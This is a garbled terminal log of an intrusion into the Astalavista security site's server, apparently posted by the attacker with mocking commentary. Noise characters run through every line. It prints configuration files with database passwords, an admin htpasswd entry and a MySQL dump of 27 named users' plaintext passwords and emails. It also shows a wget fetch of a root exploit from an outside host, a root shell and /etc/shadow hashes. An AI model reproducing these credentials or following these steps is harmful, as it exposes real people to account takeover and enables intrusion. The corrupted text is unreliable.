6 J$ z4 ~9 h9 s) q, Q8 ?drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
5 H* q/ ]' d5 Edrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
' d) i4 S" @; ~4 b7 _. n( g ~' _: r-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg1 Y+ V" v7 |: @- A; d+ A3 R. o
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config( J4 y# ?' I- H A# i
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
i! _; V- e* i& N/ ]5 v) Y8 \( udrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd5 K. K4 q2 s9 x2 m0 c
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
9 D4 \; K) l i) i; h-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico/ @; a% J5 g% }: `4 p$ _
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
) S" t! `4 e2 q, X9 T/ P, b6 cdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
5 e% P2 f# z' m [4 E-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
8 O* g; `6 }; I! x. _-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess1 C3 P: V; e$ F
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php1 w) M' f( @7 z# z- L$ Y
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html0 q! J( J5 ^ c% W$ `& k
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php1 \. A3 Z: V' C# p7 H, M$ Z0 H
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php; v' A. q3 k8 `: z
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
' T+ o/ v# I, a, odrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ U! ~$ S- h0 y/ ^. P( R9 N1 B* C. U
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang7 n# W( X; I h) k- q9 e
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib+ A! P, ] W% x- M3 q+ o
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
/ U6 Z% D$ E* C8 ?2 q) Adrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member3 i7 r9 a h% u% [
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata& v5 g; f0 a5 A# V
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new8 e% y' e$ ^' }6 z1 m
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
0 v" O5 O( {) x0 s3 tdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re! j; H4 ~1 T- v4 j: e8 f
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt A& w2 d! G4 D/ h) m5 m
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss9 o8 v( C1 S8 t9 P8 ?+ k- m
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
( \! G: N7 b# `( Jdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com3 x& P8 K' a9 U+ x f
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
* i4 ]6 K" Q/ D% b# E( m/ Bdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
8 d: O; c3 q0 |drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
% d/ r2 [& P" C, f9 v! Odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2+ B8 R0 \; H5 D2 N) j2 G
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
& `2 r2 N. u: J5 h+ P- M-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php9 U8 P$ {4 k9 O4 a6 n
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki0 k: i o! \% E0 C" ?1 A, Y0 c
1 k+ B7 ^, @! S% t) v
sh-3.2$ head -20 index.php; z# R( S8 H) a, @- v1 j1 C
<?PHP4 b+ S- j6 q N. O$ ^+ z
/**% J ~1 C# l3 \; t0 V
* Mainfile (external) for astalavistaNET v2.0
1 n4 e/ m9 ?- i* M% ^* x0 f2 c0 ?*
" g' S) b' P/ j* @copyright Astalavista IT Engineering GmbH: T1 [& u4 ^. k2 e
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>+ ]7 ^8 c* \8 X1 s* ^, A R
* @version 1.07 |( {3 J Z' `
*/4 X) ?5 P* \6 T+ v8 A# W: z
4 C7 ?& a& n" B$ r) E
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {9 n' v% J! }, D1 f3 w, _- c
$dontStartSession = false;& e8 a$ b2 G3 H$ C5 J7 a
} else {
" Q6 ~# k, E0 Q- t8 v4 L. g $dontStartSession = true;
$ T0 Z6 j; k5 p9 I% K) ` }( b" b$ s4 O9 x8 r4 U) q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
. H* ~$ Z& C/ `, I3 m$ _ require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);- P% `7 i4 o# t6 ]( v
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);# A3 D. ?2 m7 ~1 T( Y
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);6 h( {* p" a. x( c! \
, y; w: u8 i! h5 z$ F; x
sh-3.2$ cd config
9 F+ B% S9 `* N5 m e! a$ j3 S. Zsh-3.2$ ls -la
5 c# C: G5 b2 S) c' P7 Ptotal 32( S5 j! y( J/ ~& S: u
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
N6 {4 H) J! G, y/ Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 B/ a" [. a: z7 X0 {-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
0 C# }/ U$ q8 f6 o. a3 V( N9 `-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php# |5 o& r- @* Z. B$ @/ i
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
$ F, a5 p8 I4 y& b P1 g9 e5 ^-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php, C* J( y O6 k, l8 P. p
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php& [5 Q5 V4 f( O# T) y& Y8 w2 \. o
2 l7 q5 m8 P& J; m1 G7 H. E) bsh-3.2$ cat com.conf.php
* `8 p; X5 E1 c* v" b[snip]* L6 l( |0 Z) K9 O
//member-database
8 z3 z/ w- L! P$ J0 y, @$_CONFIG['db_mem_server'] = ‘localhost’;
; b* B$ X) w3 }) Y$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;; v2 D8 C0 Q1 S8 k. Z0 n/ l
$_CONFIG['db_mem_user'] = ‘astanet_db’;6 K1 ?# M2 O# z" E# ^' Q" f0 c' f7 B* i
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
, n/ m4 ]( M: t& X! C/ @$_CONFIG['db_mem_debug'] = false; //true or false
0 Q# S6 n! K, T2 s' u//ads-database. w1 A: x& ~2 Z* S0 R
$_CONFIG['db_ads_server'] = ‘localhost’;
( c% T2 q" O, ?4 J7 C( @1 c$_CONFIG['db_ads_database'] = ‘astanet_ads’;! e6 A' l( b7 |2 h0 K
$_CONFIG['db_ads_user'] = ‘astanet_db’;
8 d8 A1 g4 d' C6 }& v% n, U: J; I$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
5 S/ {" S2 j3 R ^5 F9 O* U7 h2 C0 x$_CONFIG['db_ads_debug'] = false; //true or false' Y; e. a. r) |! z$ |' h
//rainbow-database0 q# q1 i. }' z
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;- x/ M" E7 I; e r$ Y8 x
$_CONFIG['db_rainbow_database'] = ‘rainbow’;) r: u: `, P3 d3 b+ K& n8 V) s
$_CONFIG['db_rainbow_user'] = ‘dinu’;6 B! U4 a% y- @. f: g- E0 V( ~
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
! y) j; k$ o) A' W$_CONFIG['db_rainbow_debug'] = false; //true or false! S/ I, [$ I( S% l( W c u
//mailing lists database, u9 p1 u8 m/ s
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;2 Y- `* F% z2 M8 ^5 s- w- C6 B
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’; q- B! [! I2 C( z! N% i
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
$ W0 e5 ?) u% U8 p$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;" P7 v! T5 X" M4 I. U. z% z% z
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
/ Q, C$ f" W2 [- G0 f( x) x//paypal- E- p* B5 Q O4 @
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;0 S, C+ C) S$ @5 [
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;' K. U7 \6 I3 n0 i0 u9 T
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
! @3 _1 k; H. }$_CONFIG['sub_pp_noship'] = ‘1′;( U* m5 f1 c1 k. j
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
* n5 B7 @9 ]4 X- k6 i; P[snip]: v! V. c L8 _. [4 b& g6 y
3 D) Q% J: `. @0 ?$ psh-3.2$ cd ..( `) Y) ^' F( J
sh-3.2$ cd member
8 E" {( ~, Q8 ]# M$ ^4 Zsh-3.2$ ls -la/ f9 k, k4 |3 {: S" L
total 20* Z9 s0 E- }8 \
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
; V9 f* C4 |4 {drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# J2 y' D9 i# Z+ X @! Q-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess" [9 m( h" M3 \* g' t- A
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php# O0 S0 h3 n ~+ f- R1 M1 }
sh-3.2$ cat .htaccess
$ ~1 D G$ d) h' i/ X9 }1 n) RSecFilterEngine off
" Z' z. b; j$ f( ]8 e# I- p8 j( ^; @% A& j9 Z5 w0 k/ E
sh-3.2$ cd ..# r3 U( ~3 \. }0 J) r: J
sh-3.2$ cd cron
2 Q1 u- M) q" d; J b0 esh-3.2$ ls -la
. ~# ]8 Q7 e2 T1 M J! @9 i( Z5 ttotal 168- P; B: F- S+ f# N# `
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
; u) U5 u% m/ S+ Xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..* X# T" H8 n& F- H( q: L
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
1 c; b q! [* g5 V# A! [5 p7 a-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
% l7 j% N4 L' D$ R* V' a3 k-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
1 t8 o2 c1 f4 o, C-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
: e2 L' n' C P& S$ P# {. ~-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php! C% y1 n" y- o8 o
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ ^6 F7 j+ [! h$ O: N
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
6 J6 R6 E4 ^8 j& K- ?& x-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php) F3 n% m! P# R& n5 c1 t
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh% o4 L8 r/ M) r |
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+ W0 C% n' @8 [& y8 |-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
/ d2 W$ Z4 x s-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
+ N+ D7 a. W2 v' J, K* G-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh& |, N! f# ^' m, {
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php& l+ h3 c8 f& p
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php2 l* t3 }+ \" B5 [/ _2 b& q1 t
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php- _ p3 K3 y' r3 m/ G1 C
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
l; k4 A/ k: _9 W-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
6 v w2 D1 ?! G9 ?drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
8 ?( ]. r4 }0 g2 K& a" J-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php! @6 H. I/ H" b U% i& \
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php- S8 r, d3 c, `6 A# M# F" }' m
% ~2 I) j* A: D% x# A4 Y k: M7 i
sh-3.2$ cd ..4 L- Y/ }6 y& M' O- c, I( `
sh-3.2$ cd _007
6 V& h) k% Q7 Z7 t& h6 ~sh-3.2$ ls -la' F. V1 A' ?* R. r/ |; ?
total 24
/ [+ ?9 J: Y- v& L% w7 ]drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .5 X1 [9 i0 @$ `4 w. i3 S
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 e6 B% T& A0 K- j* X) s' Y-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
6 Z1 H; Y3 t" J% f-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php/ Z Y7 e( ^1 N3 p
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php1 {6 G! L7 |7 V: F& R
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
" j; |% F" Q8 r9 U4 A1 Q p* n. K8 h/ m* W H6 t6 ?0 Q$ U- f/ b' x
sh-3.2$ cat .htaccess m( c$ E6 s) H% Z
authType Basic: L2 Z4 t# E/ y3 g' U& h ?4 W# N
authName Admin
1 F, W1 V# a( I* k; W# ~authUserFile /home/astanet/auth/.htadm_pwd
0 t$ v' [8 s0 x, a3 l5 N+ q* jrequire valid-user
& p/ O: D2 G# a7 `
- V$ ]$ g9 y! \/ T# i% p$ ksh-3.2$ cat /home/astanet/auth/.htadm_pwd9 n g9 ~+ B. m. y1 H* Q L- n
admin2net:CR0bl65MwhfT
& [* s2 X& z0 S0 u. |6 @- |; x7 J% Z2 Z/ v; F$ u) w
sh-3.2$ mysql -u astanet_db -p
, r3 a4 \/ l* A6 S: o( s, ~/ ZEnter password:) F' I* U) ?- U f. S; b
Welcome to the MySQL monitor. Commands end with ; or \g.
8 o5 P1 v5 d2 M- wYour MySQL connection id is 275153
\: S: K& ]7 E$ _% _Server version: 5.0.45-community-log MySQL Community Edition (GPL)
1 v# f& c8 j; d3 Z$ @! f) n0 \% ]0 k! j1 G
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! ]& X' H( ?6 i: f) q4 q
# U$ I+ @/ ]* ]mysql> show databases;
4 b& v0 Y8 _8 E$ j. T- L# E' q: k8 C+———————–+
9 g. {2 N) A' [| Database |, p' Z; ^5 P* J4 v( G# p0 w
+———————–+
2 \& r! k; F+ Y7 \* q" K- _| information_schema |
6 E1 \# r/ ~7 |6 A; {& ]2 K| astanet_ads |1 W1 t6 P' T# p; O: S8 M# X
| astanet_mailing_lists |
) a. P1 v) Z& K! \: S" v| astanet_mediawiki |
3 d* d4 |: n) Y6 [1 y- \& q| astanet_membersystem |
7 C* c8 x8 t7 E: }# G- ^| test | U. `1 M5 g$ D. W- H
+———————–+
5 g% Z) X- ~1 E. I8 F. b; j- t6 rows in set (0.00 sec)
3 J& a6 C% C7 _% q$ E$ Q2 H% z* J& A w6 p% W% z+ ^, r6 @
mysql> use astanet_membersystem
* V5 A r. O" R* XDatabase changed4 Q' }5 _+ |: F3 K
mysql> show tables;
1 C3 F7 @3 y7 j/ a" ]3 m) K3 o+———————————–+
/ P% S7 E7 R9 `; k7 t1 U| Tables_in_astanet_membersystem |# N0 D2 c* G5 e
+———————————–+
6 l h- l* _8 ?8 x$ _2 h# \ o| blacklist_categories |4 j# o# e0 } U2 ~7 s0 y+ Y( }0 x
| blacklist_content |% j3 r0 \' X2 n0 g- p
| blacklist_levels | J" [8 t G% m# ~4 B) h7 w
| blacklist_mcset |
( ]: D/ Y `* r2 ]| dir_categories |& |2 }/ `! }) t; q, M( \" D
| dir_comments |
; M( }4 R" E# x1 q7 [8 k| dir_links |
! B& s; C6 B, t% T. P) h" \8 O| dir_temp |
- w' t7 ~+ }- {/ B| dir_votes |6 N$ V5 f% z8 e6 p! Y6 W/ i
| documents |) P" h; w! l5 `* e+ [5 v
| documents_categories |/ H3 y; A5 }( q" _, ^9 h* C
| email_content |
+ |* t8 N7 @1 g: H) f% j| email_settings |9 M" c0 S4 Q$ y I/ c
| exploits |8 O y/ s) n' |+ [# w
| exploits_categories |1 p& C7 W* r2 m Q1 C% K
| exploittree_categories |
8 O" {. z, @& t' Y. p* _| exploittree_exploits |8 U' X3 S$ k7 D
| home_values |
: ]1 T2 w; b6 W5 V/ X* H| iso_countries |
% @) g/ d% Y7 \7 e| links_categories |
- Q4 T6 L+ D" m% h+ n2 D8 F0 || links_records |/ p5 Y. c0 y# B" a/ I8 |
| links_unauth |7 Q( k! U# W2 t% i3 I
| links_votes |9 O: j2 b- S6 C' W3 D1 [( p
| log |& b1 E) h! F0 c) f2 E! U
| news_categories |
7 D/ F) k4 t$ Z/ V7 ?| news_comments |
. l; Z1 Z# `" D" S2 U$ d& G| news_emoticons |6 k$ C& {1 U2 u% c
| news_latest |
+ m( V( \% F- b# P1 G| news_messages |
3 k4 G& i1 o( M+ J; ^| news_statistics |
) l) D, B4 S. z4 u; B5 L| news_votes |: ]1 {0 p3 X9 ?( W* j u; e
| prices_content |% }8 f' [8 {' o
| prices_offers |
1 g# B7 W' J2 D* U1 s% ]: Z| rss_settings |
! v& |+ [: y$ Q) s8 W$ H# `| sessions |9 e7 g, W: v; F! p. f
| stats_signups |4 F4 X2 X* p0 {. x0 o) A7 `
| u2u2 |! [, v2 _$ {6 a* |$ g
| u2u_contact |7 b$ f, V0 b# E
| u2u_settings |
2 k; ]& K! |7 j8 O$ n' e, A| user_keywords_selected_categories |
v% x& ?- x" I; O% @8 c0 O+ L| users |
- o; x! k ^: i$ n/ w( A8 H| users_ipn_test |
- M$ M' I e" r9 E- w) w6 e) }, H! u3 U| users_keyword_values |
' G, S2 Z+ M5 g& C| users_profile |
3 U3 ]: Z+ t; c) q, h| users_temp |
+ r2 @1 K/ I3 D| users_upgrade |
* x) G' p8 w9 d5 z# t ^+———————————–+
! @& i4 G' |/ K5 ?( i) B# J46 rows in set (0.00 sec)7 f- N, [2 Q& Y3 F2 s/ P
9 Z* h; T: D: Y$ v; d7 ^7 }
mysql> describe users;( N' ]7 m; }8 @& U( n
+————————–+————————————–+——+—–+———————+—————-+
4 n& y& D" A& _! c% P| Field | Type | Null | Key | Default | Extra |
5 D& k# y, P) r3 W l; E4 b+————————–+————————————–+——+—–+———————+—————-+7 P4 C2 d5 m* i1 K x, H
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |% m7 n$ H3 b) {$ A. S @
| user | varchar(50) | NO | | | |
0 P! X3 I0 g( O8 ~) F8 F9 C| nickname | varchar(30) | NO | MUL | anonymous | |
+ H' m9 O4 t) E' r( h| password | varchar(30) | NO | | | |
, `% v4 w* b, P# T% l, D1 z| userlevel | tinyint(3) | YES | MUL | NULL | |
$ x0 v' H! u3 b9 r6 b* p; R| exp | int(8) unsigned | NO | | 0 | |
9 N4 ~6 R( v, U8 z8 z| email | varchar(50) | NO | | | |4 z. E: M# b5 B# ^0 _, l& [7 ], P
| ip | varchar(15) | NO | | 0 | |
# u: G5 q+ s0 T" J; z$ i- G| proxy | set(’0′,’1′) | NO | | 0 | |
! \: z k8 h+ _% n& e| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
& A. O$ ~, F0 ~' Z| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |9 g- ?2 ]9 w5 I+ Q
| anz_in | tinyint(1) | NO | | -1 | |* G1 `3 Y' X; l" e+ F1 a* O( f6 N
| status | tinyint(1) unsigned | NO | | 0 | |
$ z8 X0 M3 Z$ I0 e0 ^5 v| checked | set(’0′,’1′,’2′) | NO | | 0 | |- m" q" e" ]6 h% _4 F. U$ m; b
| freemember | set(’0′,’1′) | NO | | 0 | |
/ O! V; U8 K1 l6 D| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |2 m4 e- l9 p4 W' g. Z, b
| lang | tinytext | NO | | | |
% k; y3 J' x* [7 |; b$ J, U| adid | smallint(6) | NO | | 0 | |( v' W% G2 B5 P% I; s
| pp_txn_id | varchar(255) | YES | | NULL | |
$ ^5 Z% O2 n' W6 C7 i| cnb_transaction_id | varchar(255) | YES | | NULL | |# v* ?" A: c( _7 V+ ~, G. L
| cnb_order_id | varchar(255) | YES | | NULL | |
; P1 q, t" }7 P| cnb_user_id | int(11) | YES | | 0 | |
6 K- s$ y. V9 W- {- f c3 N' N% s" r+————————–+————————————–+——+—–+———————+—————-+
8 J9 D) d1 g8 \5 h; x22 rows in set (0.01 sec)
- a) [0 L2 j: D: f! r. T9 `! f( g' O5 I4 o! J5 I; e$ K
mysql> select count(*) as skids from users;
( Z/ x7 f* r" M7 l3 K0 r+——-+$ Y/ @4 O5 n% u; P! S3 e2 }2 W
| skids |
: k" ]& ^8 a, T2 [) w* z1 r+——-+
; A3 }* k. R$ w7 U( \ s0 Q5 k+ j* l9 e| 25199 |
+ B4 `1 e- t& I' ]$ a0 L+——-+6 P! B4 f# x) Z0 z
1 row in set (0.00 sec)
( ?! \( q' [% `
- I% V1 \. L5 z) |- _mysql> select user,nickname,password,email from users where userlevel = 1;
6 r" J' H3 I2 S! N0 Z7 D2 d& \7 d' @+————————–+———————-+——————+———————————–+
; v6 l6 J% E: \; H2 D) W; s| user | nickname | password | email |( U- j) y# h# n7 g$ b
+————————–+———————-+——————+———————————–+
; m2 e+ f Y& J/ v7 z$ n+ Q| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
: D8 ^( t: [" |4 n2 X6 m& c| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |. ~: f; Z9 }' l) q6 D: U
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |9 |: }* Y) E+ q
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |7 m: ^+ g! d- n l* w- `
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |' E8 d/ a4 H. _4 ]4 l" A2 Z
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |( v: C1 c( k) q1 f& a# F9 [
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |7 Z9 ]/ K' O; ^; Y- N
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
& Q% v& v2 U. k# `; j( @- z| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
6 Z7 B- h2 a( o+ R; j| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
' S4 S& o3 \) c, I. @3 y p, U| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |% N& D8 R1 s# c
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |7 j3 U" e+ }3 U' g: W9 M, @
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
0 \1 @7 M; c) y- {. T5 J| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |" v% L! l# g, j
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |. k6 _& @" p7 m j$ O8 E0 Z( _
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |4 E3 K. G# T" e" v! h6 ^5 K$ @# G% N
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
7 p, V4 L: }. T$ I' y' o| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
4 V% a" e4 v4 ?; { @. G| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
0 w" Q* x) \' B| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |, T+ i* W+ ?) \2 m( T
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |( {; H/ A- Y" E% U
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
" u! H3 M' R" X$ e+ r| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
. ]5 c; C) L; b. G$ p| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |: ?( J5 l% h6 M4 r! Y, W* z
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
6 s- Y5 {$ r+ x3 Y( B| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
2 ^: x4 _# s, a2 e. x| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
4 a* _$ N* ~ X( B7 |1 i2 U0 K+————————–+———————-+——————+———————————–+2 J7 G" j( c3 ~5 y1 c) l
27 rows in set (0.00 sec)
" Q3 w2 y( s8 _% B i( g/ q, h% `; T
mysql> exit;
4 d% R% [4 k5 i' a1 ?) p' jBye
7 b! E1 M# P$ b; V, ^) \0 [ M
% l0 m8 L4 |; r8 r[~] plaintext passwords? yes,9 s9 `: O0 A- w
Those so called “security professionals” who charge you $6.66 / month to/ w' V3 P1 Q6 z, q3 d) D
register at their hack-proof portal, save your passwords in plaintext…
/ T' N' O+ v; C7 f& H% Tbrilliant!6 v- B9 \8 x& P
' Q6 Y! h) ~/ |5 ^[~] This been fun but we want more.4 @1 Y! R' `, x" C: I' `' u
6 t1 K% x: n' z: e- j+ k4 `sh-3.2$ uname -a# @$ v8 @( k' k1 u T) ?
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- ~8 E/ C j4 [8 Gsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]- n+ [+ n" o" r/ F5 V, Z1 r
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
, k8 x8 {4 y& o# M- |Resolving anti.sec.labs… 13.33.33.372 D- L q' r' ?7 c
Connecting to anti.sec.labs|13.33.33.37|:80… connected.) z. ^7 [; t" T( G) n9 ^; v, ?9 U
HTTP request sent, awaiting response… 200 OK
0 [% k3 |( b4 T* WLength: 18200 (18K) [text/plain]
6 d; r/ P. @! z* C4 v& d9 w/ e3 A' @7 zSaving to: `g0troot’
& ~- f$ L: f; i' O' t
+ O% p, M- k" N- [100%[=========================================================================================================================================>] 18,200 58.6K/s in
! f8 e: ^5 t% w0.3s( p- A1 a7 |5 a8 R8 c5 D
+ f: N" `+ f7 v' C, S18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]4 g E# E g4 D5 M% K% |
1 C. O0 X* K* G Y4 `; G
sh-3.2$ ./g0troot -i x86_64" z& L B. S6 n
[+] g0troot - anti.sec.labs
: {$ g; @4 O/ |[+] Target: 2.6.18-128.1.10.el5
) c/ V5 x. N3 r7 K[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]+ F; l( @3 r3 {# h9 E0 Z2 n
) I# M- i7 g1 b- t/ b* V
[+] r00tr00t
+ D2 \4 b" }& A0 }5 T# J[~] Executing shell…
! i# }. B6 u: O# L" k* T/ f: t. J& k0 z4 L; ?
sh-3.2# id
5 R8 C$ s5 I6 T6 Duid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)( T8 u; f9 w3 x0 Z+ T& I
: O# m, p3 j$ G' C" Q! k; `0 fsh-3.2# cat /etc/shadow! V% {# }* K0 V- x6 ^1 F! O
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::2 p/ h$ D e' G, D3 p
[snip]
6 _7 j- A7 n* C. l7 j/ d8 X$ }0 Hadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::: ~2 O" l8 ?3 L5 A& A* z# d
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::! u) K) Y. P% [0 J3 d& y9 j
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::- O5 l9 v3 U9 f
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
: t3 Q- f$ b& {+ Y$ G1 J8 h5 j/ \" i: L8 O/ z
sh-3.2# cat /etc/motd
% I7 `7 h. y/ F#####################################################- Q. ~, p5 G, @" _
